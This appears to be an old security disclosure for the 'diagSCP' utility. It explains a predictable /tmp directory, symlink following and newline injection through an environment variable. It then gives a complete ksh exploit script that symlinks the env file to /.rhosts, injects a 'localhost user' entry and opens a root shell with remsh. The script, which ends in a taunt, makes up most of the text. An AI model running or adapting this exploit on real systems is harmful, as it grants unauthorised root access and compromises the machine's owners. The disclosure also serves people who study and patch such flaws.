BUG1 : diagSCP

Synopsis
========

The diagSCP utility creates a temporary directory in /tmp with a predictable 
name.  It will also happily follow any evil symlink you put in. The 'env' file 
created by diagSCP in this directory contains the user's environment and is
thus subject to customization.  We just have to insert some ^J in a variable
to have it go to the next line, so it looks like a valid entry in .rhosts

Exploit
=======

#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i